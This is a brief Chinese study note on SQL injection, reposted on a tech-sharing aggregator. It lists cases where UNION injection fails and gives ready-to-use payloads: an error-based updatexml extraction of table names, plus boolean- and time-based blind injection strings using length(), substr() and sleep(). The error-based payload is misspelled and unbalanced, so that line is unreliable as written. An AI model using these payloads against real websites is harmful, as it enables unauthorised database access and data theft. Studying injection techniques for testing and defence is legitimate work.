标签：语句 database 查询 SQL 盲注 id select 注入

一.Union查询注入不使用的地方

1.注入语句无法截断，且不清楚完整的SQL查询语句；

2.页面不能返回查询信息的时候；

3.Web页面中有两个SQL查询语句，查询语句的列数不同；

二.关于MySQL处理XML

1.先准备以下XML内容

?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name) 
from information_schma.tables,0x7e),1)

三.盲注

没有回显的时候

1.Boolean型注入

?id=1 and  length(database())=5

?id=1 and (select substr(database(),1,1)='l')

2.时间型注入

?id=1 and if(length(database())=5,sleep(2),1);

?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);

标签：语句,database,查询,SQL,盲注,id,select,注入
来源： https://www.cnblogs.com/eveplw/p/16538155.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。